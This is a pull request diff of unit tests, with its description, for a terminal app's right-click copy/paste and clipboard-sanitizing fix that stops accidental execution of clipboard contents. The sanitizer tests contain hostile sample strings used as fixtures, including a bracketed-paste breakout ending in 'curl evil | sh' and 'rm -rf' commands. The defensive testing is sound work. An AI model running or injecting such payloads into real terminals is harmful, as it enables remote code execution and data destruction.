+ * Shell-only sessions (elevated included) MUST receive the same vars. An earlier
+ * revision of this file asserted the opposite — that shell-only sessions were
+ * exempt — which pinned a live defect: the vars are inert for the shell itself
+ * but govern any `claude` the user starts by hand, and the account re-auth flow
+ * drops users at a shell-only prompt to do exactly that. The exempted claude ran
+ * with mouse tracking on, xterm's selection came back empty, and right-click
+ * "copy" became paste-into-the-PTY — at a shell prompt, EXECUTION of the
+ * clipboard. SSH sessions still go through a different path.
  *
  * Note: we clear CLAUDE_CODE_DISABLE_MOUSE from process.env before each test
  * because the developer machine (and CI) may run with this var set, which would
@@ -23,11 +29,15 @@ const BASE_OPTS = { sessionId: 'ses-1', cwd: '/work', cols: 80, rows: 24 }
 beforeEach(() => {
   delete process.env.CLAUDE_CODE_DISABLE_MOUSE
   delete process.env.CLAUDE_CODE_DISABLE_ALTERNATE_SCREEN
+  delete process.env.CLAUDE_CODE_DISABLE_MOUSE_CLICKS
+  delete process.env.CLAUDE_CODE_DISABLE_BACKGROUND_TASKS
 })
 
 afterEach(() => {
   delete process.env.CLAUDE_CODE_DISABLE_MOUSE
   delete process.env.CLAUDE_CODE_DISABLE_ALTERNATE_SCREEN
+  delete process.env.CLAUDE_CODE_DISABLE_MOUSE_CLICKS
+  delete process.env.CLAUDE_CODE_DISABLE_BACKGROUND_TASKS
 })
 
 describe('buildClaudeLocalSpawn — CLAUDE_CODE_DISABLE_MOUSE', () => {
@@ -46,13 +56,34 @@ describe('buildClaudeLocalSpawn — CLAUDE_CODE_DISABLE_MOUSE', () => {
     expect(env.CLAUDE_CODE_DISABLE_MOUSE).toBeUndefined()
   })
 
-  it('does NOT set CLAUDE_CODE_DISABLE_MOUSE for shell-only sessions (true)', () => {
+  it('sets CLAUDE_CODE_DISABLE_MOUSE=1 for shell-only sessions (classic true)', () => {
     const { env } = buildClaudeLocalSpawn({ ...BASE_OPTS, shellOnly: true, classicTerminalCopyPaste: true })
+    expect(env.CLAUDE_CODE_DISABLE_MOUSE).toBe('1')
+  })
+
+  it('sets CLAUDE_CODE_DISABLE_MOUSE=1 for shell-only sessions (classic undefined = default-on)', () => {
+    const { env } = buildClaudeLocalSpawn({ ...BASE_OPTS, shellOnly: true })
+    expect(env.CLAUDE_CODE_DISABLE_MOUSE).toBe('1')
+  })
+
+  it('omits CLAUDE_CODE_DISABLE_MOUSE for shell-only sessions when classic is false', () => {
+    const { env } = buildClaudeLocalSpawn({ ...BASE_OPTS, shellOnly: true, classicTerminalCopyPaste: false })
     expect(env.CLAUDE_CODE_DISABLE_MOUSE).toBeUndefined()
   })
 
-  it('does NOT set CLAUDE_CODE_DISABLE_MOUSE for shell-only sessions (undefined)', () => {
+  it('sets CLAUDE_CODE_DISABLE_MOUSE=1 for ELEVATED shell-only sessions too', () => {
+    const { env } = buildClaudeLocalSpawn({ ...BASE_OPTS, shellOnly: true, elevated: true })
+    expect(env.CLAUDE_CODE_DISABLE_MOUSE).toBe('1')
+  })
+
+  it('stamps the other protective CLAUDE vars for shell-only sessions (defaults)', () => {
+    // Same rationale as the mouse var: a hand-run `claude` in a Terminal must get
+    // the identical protective treatment as a CCC-launched one. Clickable
+    // questions default off ⇒ DISABLE_MOUSE_CLICKS; background tasks default
+    // disabled ⇒ DISABLE_BACKGROUND_TASKS; classic default ⇒ alt-screen off.
     const { env } = buildClaudeLocalSpawn({ ...BASE_OPTS, shellOnly: true })
-    expect(env.CLAUDE_CODE_DISABLE_MOUSE).toBeUndefined()
+    expect(env.CLAUDE_CODE_DISABLE_ALTERNATE_SCREEN).toBe('1')
+    expect(env.CLAUDE_CODE_DISABLE_MOUSE_CLICKS).toBe('1')
+    expect(env.CLAUDE_CODE_DISABLE_BACKGROUND_TASKS).toBe('1')
   })
 })

--- a/tests/unit/providers/claude/clickable-questions-env.test.ts
+++ b/tests/unit/providers/claude/clickable-questions-env.test.ts
@@ -6,9 +6,11 @@
  * hover, keeps wheel scroll). CCC defaults the feature OFF: the var must be
  * present unless the user explicitly enables clickableQuestions in Settings.
  *
- * Shell-only sessions receive no CLAUDE env vars (same contract as
- * CLAUDE_CODE_DISABLE_MOUSE). process.env is cleared per test because a dev
- * machine may run with the var set, bleeding through the spread.
+ * Shell-only sessions receive the SAME CLAUDE env vars as Claude sessions
+ * (same contract as CLAUDE_CODE_DISABLE_MOUSE): the vars are inert for the
+ * shell but govern any `claude` the user starts by hand there. process.env is
+ * cleared per test because a dev machine may run with the var set, bleeding
+ * through the spread.
  */
 import { describe, it, expect, beforeEach, afterEach } from 'vitest'
 import { buildClaudeLocalSpawn } from '../../../../src/main/providers/claude/spawn'
@@ -49,9 +51,9 @@ describe('buildClaudeLocalSpawn — CLAUDE_CODE_DISABLE_MOUSE_CLICKS', () => {
     expect(env.CLAUDE_CODE_DISABLE_MOUSE_CLICKS).toBeUndefined()
   })
 
-  it('does NOT set the var for shell-only sessions', () => {
+  it('sets the var for shell-only sessions too (default: clicks off for a hand-run claude)', () => {
     const { env } = buildClaudeLocalSpawn({ ...BASE_OPTS, shellOnly: true })
-    expect(env.CLAUDE_CODE_DISABLE_MOUSE_CLICKS).toBeUndefined()
+    expect(env.CLAUDE_CODE_DISABLE_MOUSE_CLICKS).toBe('1')
   })
 
   it('is independent of classicTerminalCopyPaste (both vars coexist)', () => {

--- a/tests/unit/renderer/terminal-context-menu.test.tsx
+++ b/tests/unit/renderer/terminal-context-menu.test.tsx
@@ -1,0 +1,113 @@
+// @vitest-environment jsdom
+//
+// TerminalContextMenu — the explicit Copy/Paste menu that replaces blind
+// right-click paste wherever a blind decision would be unsafe (mouse-tracking
+// TUIs, non-classic mode, multi-line clipboard at a raw prompt). The menu's
+// entire contract is "nothing reaches the PTY without an explicit click", so
+// the tests pin exactly that: disabled Copy cannot fire, Paste fires only on
+// its own click, and every dismiss path closes without invoking an action.
+import { describe, it, expect, vi } from 'vitest'
+import React from 'react'
+import { createRoot, type Root } from 'react-dom/client'
+import { act } from 'react'
+import TerminalContextMenu from '../../../src/renderer/components/TerminalContextMenu'
+
+;(globalThis as any).IS_REACT_ACT_ENVIRONMENT = true
+
+function render(ui: React.ReactElement) {
+  const container = document.createElement('div')
+  document.body.appendChild(container)
+  const root: Root = createRoot(container)
+  act(() => { root.render(ui) })
+  return { container, unmount: () => { act(() => root.unmount()); container.remove() } }
+}
+
+const noop = () => {}
+
+function renderMenu(over: Partial<React.ComponentProps<typeof TerminalContextMenu>> = {}) {
+  const props = {
+    x: 100,
+    y: 100,
+    hasSelection: false,
+    onCopy: noop,
+    onPaste: noop,
+    onClose: noop,
+    ...over,
+  }
+  return render(<TerminalContextMenu {...props} />)
+}
+
+function buttonByText(container: HTMLElement, text: string): HTMLButtonElement {
+  const btn = Array.from(container.querySelectorAll('button')).find((b) =>
+    b.textContent?.includes(text),
+  )
+  if (!btn) throw new Error(`no ${text} button`)
+  return btn
+}
+
+describe('TerminalContextMenu', () => {
+  it('disables Copy and explains how to select when there is no selection', () => {
+    const onCopy = vi.fn()
+    const r = renderMenu({ hasSelection: false, onCopy })
+    const copy = buttonByText(r.container, 'Copy')
+    expect(copy.disabled).toBe(true)
+    // The hint is the working-copy teaching path for mouse-tracking apps.
+    expect(r.container.textContent).toContain('hold Shift')
+    act(() => { copy.click() })
+    expect(onCopy).not.toHaveBeenCalled()
+    r.unmount()
+  })
+
+  it('enables Copy when a selection exists and fires onCopy on click', () => {
+    const onCopy = vi.fn()
+    const r = renderMenu({ hasSelection: true, onCopy })
+    const copy = buttonByText(r.container, 'Copy')
+    expect(copy.disabled).toBe(false)
+    expect(r.container.textContent).not.toContain('hold Shift')
+    act(() => { copy.click() })
+    expect(onCopy).toHaveBeenCalledTimes(1)
+    r.unmount()
+  })
+
+  it('fires onPaste only from an explicit Paste click', () => {
+    const onPaste = vi.fn()
+    const r = renderMenu({ onPaste })
+    expect(onPaste).not.toHaveBeenCalled() // rendering the menu never pastes
+    act(() => { buttonByText(r.container, 'Paste').click() })
+    expect(onPaste).toHaveBeenCalledTimes(1)
+    r.unmount()
+  })
+
+  it('closes on backdrop mousedown but NOT on mousedown inside the menu', () => {
+    const onClose = vi.fn()
+    const r = renderMenu({ onClose })
+    const backdrop = r.container.querySelector('.fixed.inset-0') as HTMLElement
+    const paste = buttonByText(r.container, 'Paste')
+    act(() => { paste.dispatchEvent(new MouseEvent('mousedown', { bubbles: true })) })
+    expect(onClose).not.toHaveBeenCalled()
+    act(() => { backdrop.dispatchEvent(new MouseEvent('mousedown', { bubbles: true })) })
+    expect(onClose).toHaveBeenCalledTimes(1)
+    r.unmount()
+  })
+
+  it('closes on Escape', () => {
+    const onClose = vi.fn()
+    const r = renderMenu({ onClose })
+    act(() => {
+      document.dispatchEvent(new KeyboardEvent('keydown', { key: 'Escape', bubbles: true }))
+    })
+    expect(onClose).toHaveBeenCalledTimes(1)
+    r.unmount()
+  })
+
+  it('closes on a further right-click outside instead of stacking menus', () => {
+    const onClose = vi.fn()
+    const r = renderMenu({ onClose })
+    const backdrop = r.container.querySelector('.fixed.inset-0') as HTMLElement
+    act(() => {
+      backdrop.dispatchEvent(new MouseEvent('contextmenu', { bubbles: true, cancelable: true }))
+    })
+    expect(onClose).toHaveBeenCalledTimes(1)
+    r.unmount()
+  })
+})

--- a/tests/unit/renderer/terminal-input.test.ts
+++ b/tests/unit/renderer/terminal-input.test.ts
@@ -2,7 +2,9 @@ import { describe, it, expect } from 'vitest'
 import {
   isControlReportOnly,
   decideContextMenuAction,
+  resolveContextMenuIntent,
   blindPasteNeedsMenu,
+  sanitizeClipboardForPaste,
   isPasteChord,
   isCopyChord,
   shouldHandleTerminalPaste,
@@ -66,6 +68,80 @@ describe('decideContextMenuAction', () => {
     // Nothing in CCC handles OSC 52, so that premise was false — the menu
     // gives an explicit Paste one click away instead.
     expect(decide({ classicMode: false })).toBe('menu')
+  })
+})
+
+describe('sanitizeClipboardForPaste', () => {
+  it('strips an embedded bracketed-paste END sentinel (the RCE breakout)', () => {
+    // term.paste() wraps text in \x1b[200~..\x1b[201~ but does not strip an
+    // embedded end marker, so a clipboard carrying one breaks out of the wrap
+    // and the trailing bytes execute. Removing ESC removes the sentinel.
+    const evil = 'echo hi\x1b[201~\r; curl evil | sh\r'
+    const clean = sanitizeClipboardForPaste(evil)
+    // The ESC is gone, so \x1b[201~ is no longer the bracketed-paste end marker —
+    // the leftover literal "[201~" is inert text the terminal never interprets.
+    expect(clean).not.toContain('\x1b')
+    expect(clean).toBe('echo hi[201~\r; curl evil | sh\r')
+  })
+
+  it('strips readline accept-line controls that submit with no newline (Ctrl-O etc.)', () => {
+    // \x0f = operate-and-get-next; \x01 = beginning-of-line; both are C0 controls
+    // a newline check would miss. All must go.
+    expect(sanitizeClipboardForPaste('rm -rf important\x0f')).toBe('rm -rf important')
+    expect(sanitizeClipboardForPaste('\x01payload')).toBe('payload')
+  })
+
+  it('preserves tab and the newline pair (needed downstream), and normal text', () => {
+    expect(sanitizeClipboardForPaste('a\tb')).toBe('a\tb')
+    expect(sanitizeClipboardForPaste('line1\nline2\r')).toBe('line1\nline2\r')
+    expect(sanitizeClipboardForPaste('npm run typecheck')).toBe('npm run typecheck')
+    // Multi-byte UTF-8 (>= 0x80) is not a C0 control — untouched.
+    expect(sanitizeClipboardForPaste('café → 日本語')).toBe('café → 日本語')
+  })
+
+  it('strips DEL (0x7f) as well', () => {
+    expect(sanitizeClipboardForPaste('a\x7fb')).toBe('ab')
+  })
+})
+
+describe('resolveContextMenuIntent (the term.modes wiring)', () => {
+  // A fake terminal exposing just the slice the resolver reads. This is the glue
+  // that a pure-function test of decideContextMenuAction cannot cover: a flip of
+  // the mouseTrackingMode compare in resolveContextMenuIntent must FAIL here.
+  const fakeTerm = (over: {
+    selection?: string
+    mouseTrackingMode?: string
+    bracketedPasteMode?: boolean
+    noModes?: boolean
+  } = {}) => ({
+    getSelection: () => over.selection ?? '',
+    modes: over.noModes
+      ? undefined
+      : { mouseTrackingMode: over.mouseTrackingMode ?? 'none', bracketedPasteMode: over.bracketedPasteMode ?? false },
+  })
+
+  it('maps a mouse-tracking terminal (no selection) to the menu, not a paste', () => {
+    expect(resolveContextMenuIntent(fakeTerm({ mouseTrackingMode: 'any' }), true).action).toBe('menu')
+    expect(resolveContextMenuIntent(fakeTerm({ mouseTrackingMode: 'vt200' }), false).action).toBe('menu')
+  })
+
+  it('maps a non-tracking classic prompt (no selection) to a paste', () => {
+    const r = resolveContextMenuIntent(fakeTerm({ mouseTrackingMode: 'none' }), true)
+    expect(r.action).toBe('paste')
+    expect(r.mouseTracking).toBe(false)
+  })
+
+  it('reports selection as copy and surfaces bracketedPaste for the caller', () => {
+    const r = resolveContextMenuIntent(fakeTerm({ selection: 'x', bracketedPasteMode: true }), true)
+    expect(r.action).toBe('copy')
+    expect(r.bracketedPaste).toBe(true)
+  })
+
+  it('treats absent term.modes as no tracking / no bracketed paste (no throw)', () => {
+    const r = resolveContextMenuIntent(fakeTerm({ noModes: true }), true)
+    expect(r.action).toBe('paste')
+    expect(r.mouseTracking).toBe(false)
+    expect(r.bracketedPaste).toBe(false)
   })
 })
 

--- a/tests/unit/renderer/terminal-input.test.ts
+++ b/tests/unit/renderer/terminal-input.test.ts
@@ -2,6 +2,7 @@ import { describe, it, expect } from 'vitest'
 import {
   isControlReportOnly,
   decideContextMenuAction,
+  blindPasteNeedsMenu,
   isPasteChord,
   isCopyChord,
   shouldHandleTerminalPaste,
@@ -34,24 +35,58 @@ describe('isControlReportOnly', () => {
 })
 
 describe('decideContextMenuAction', () => {
-  describe('classic mode (classicTerminalCopyPaste: true)', () => {
-    it('returns copy when text is selected', () => {
-      expect(decideContextMenuAction(true, true)).toBe('copy')
-    })
-    it('returns paste when nothing is selected', () => {
-      expect(decideContextMenuAction(false, true)).toBe('paste')
-    })
+  const decide = (over: Partial<Parameters<typeof decideContextMenuAction>[0]> = {}) =>
+    decideContextMenuAction({ hasSelection: false, classicMode: true, mouseTracking: false, ...over })
+
+  it('copies whenever text is selected — in every mode', () => {
+    // A visible selection is an unambiguous copy request. With mouse tracking
+    // on it can only exist via Shift+drag, which is just as deliberate.
+    expect(decide({ hasSelection: true })).toBe('copy')
+    expect(decide({ hasSelection: true, mouseTracking: true })).toBe('copy')
+    expect(decide({ hasSelection: true, classicMode: false })).toBe('copy')
+    expect(decide({ hasSelection: true, classicMode: false, mouseTracking: true })).toBe('copy')
   })
 
-  describe('non-classic mode (CC mouse on / copy-on-select active)', () => {
-    // CC already copies on mouse-up; right-click must always paste regardless
-    // of selection state so it never overwrites the intended paste target.
-    it('returns paste when nothing is selected', () => {
-      expect(decideContextMenuAction(false, false)).toBe('paste')
-    })
-    it('returns paste even when text is selected', () => {
-      expect(decideContextMenuAction(true, false)).toBe('paste')
-    })
+  it('classic + no tracking + no selection → paste (the PuTTY behaviour the setting promises)', () => {
+    expect(decide()).toBe('paste')
+  })
+
+  it('NEVER blind-pastes while mouse tracking is on — shows the menu instead', () => {
+    // THE defect this replaces: with a TUI tracking the mouse, xterm disables
+    // its selection service, so "no selection" is guaranteed and the old rule
+    // pasted the clipboard into the PTY on every right-click. A right-click at
+    // a mouse-mode claude's login screen pasted (and at a shell prompt would
+    // execute) the clipboard the user was trying to COPY into.
+    expect(decide({ mouseTracking: true })).toBe('menu')
+    expect(decide({ mouseTracking: true, classicMode: false })).toBe('menu')
+  })
+
+  it('non-classic + no selection → menu, never the old unconditional paste', () => {
+    // The old "always paste" assumed CC's copy-on-select had already copied.
+    // Nothing in CCC handles OSC 52, so that premise was false — the menu
+    // gives an explicit Paste one click away instead.
+    expect(decide({ classicMode: false })).toBe('menu')
+  })
+})
+
+describe('blindPasteNeedsMenu', () => {
+  it('routes multi-line clipboard through the menu when bracketed paste is off', () => {
+    // term.paste() converts \n to \r: at a raw prompt each line SUBMITS. One
+    // right-click would execute the clipboard — that needs an explicit click.
+    expect(blindPasteNeedsMenu('rm -rf /tmp/x\n', false)).toBe(true)
+    expect(blindPasteNeedsMenu('line1\nline2', false)).toBe(true)
+    expect(blindPasteNeedsMenu('line1\rline2', false)).toBe(true)
+  })
+
+  it('lets single-line text paste directly (no newline ⇒ nothing can submit)', () => {
+    expect(blindPasteNeedsMenu('https://example.com/very/long/url', false)).toBe(false)
+    expect(blindPasteNeedsMenu('npm run typecheck', false)).toBe(false)
+  })
+
+  it('lets multi-line text through when bracketed paste is active', () => {
+    // Bracketed paste wraps the payload in \x1b[200~..\x1b[201~ — newlines are
+    // literal there, and multi-line pastes into CC's input are routine.
+    expect(blindPasteNeedsMenu('line1\nline2\n', true)).toBe(false)
   })
 })
 


### PR DESCRIPTION
## The defect (HIGH)

Right-click in a terminal decided between copy and paste from `getSelection()` alone. While a program has **mouse tracking** on, xterm disables its selection service, so "no selection" is guaranteed — and the handler pasted the clipboard into the PTY on every right-click. At a shell prompt, `term.paste()` turns newlines into CR, so one right-click **executes whatever is on the clipboard**. The visible incident: in the account re-auth shell, right-clicking Claude Code's login screen pasted into the credential prompt and the forwarded button press hit the login URL affordance.

Root cause chain (from the 2026-08-16 auth review):
1. `buildClaudeLocalSpawn` returned early for shell-only sessions **before** stamping `CLAUDE_CODE_DISABLE_MOUSE` / `_ALTERNATE_SCREEN` / `_MOUSE_CLICKS` — and a shell-only session is exactly where users run `claude` by hand (`/login`). Three test files pinned that exemption as the contract.
2. The contextmenu handler assumed "no selection ⇒ a copy already happened on mouse-up (CC copy-on-select)". False inside CCC: nothing handles OSC 52, so no TUI can ever copy. Non-classic mode *always* pasted.
3. There was **no working way to copy** out of a mouse-tracking terminal — which is why the user was fighting right-click in the first place.

## The fix

**Main** (`spawn.ts`): the protective `CLAUDE_*` env stamping now precedes the shell-only/elevated early returns. The vars are inert for the shell; they govern any hand-run `claude`. The pinning tests now pin the opposite, with the incident documented in each.

**Renderer** (`terminalInput.ts`, `TerminalView.tsx`, new `TerminalContextMenu.tsx`):
- `decideContextMenuAction` now takes `mouseTracking` (from `term.modes.mouseTrackingMode`) and can return `'menu'`. Selection ⇒ copy (all modes). Tracking + no selection ⇒ **menu, never blind paste**. Classic + no tracking + no selection ⇒ paste (the PuTTY behaviour the setting promises). Non-classic + no tracking ⇒ menu (the old always-paste rested on the false copy-on-select premise).
- New explicit context menu with Copy / Paste items; Copy disabled without a selection, with the Shift+drag hint — the working copy path while a TUI owns the mouse.
- `blindPasteNeedsMenu`: a classic blind paste containing `\r`/`\n` headed for a **non-bracketed** prompt is routed through the menu (one explicit click) instead of submitting line-by-line. Bracketed-paste targets (CC's input) are unaffected.
- Empty-clipboard paste now shows the existing paste hint instead of failing silently; clipboard reads use the focus-independent main-process path.

## Evidence

- Full suite **5235 passed** locally; typecheck clean.
- Mutation-proven: reverting the spawn reorder → 8 tests red across 3 files; flipping the tracking guard to `'paste'` → the named decide test red; removing the Copy disable → the named menu test red. All restored, committed state verified clean.

## Residual / not in scope

- **SSH sessions** still reach claude through their own spawn path, so a remote claude keeps mouse tracking; the renderer fail-safe covers those sessions (copy = Shift+drag, then right-click or menu).
- xterm forwards the right **mousedown** to a tracking TUI before our contextmenu handler runs (unavoidable at this layer, pre-existing). The paste half is now impossible; the forwarded-click half shrinks to sessions where tracking legitimately remains.
- Runtime confirmation that CC's login screen no longer opens the browser on right-click needs the VM (owner's acceptance step) — the env change is unit-proven, the popup half is inferred from the same chain.
- OSC 52 / ClipboardAddon support (making TUI copy-on-select actually work) deliberately **not** added: it would introduce a clipboard-poisoning surface (any terminal output could overwrite the clipboard) and the selection-based copy path above already restores copying. Follow-up decision if wanted.

Adversarial pass (bounded: one attack round on this diff, one fix round) will be recorded as a comment before merge.

🤖 Generated with [Claude Code](https://claude.com/claude-code)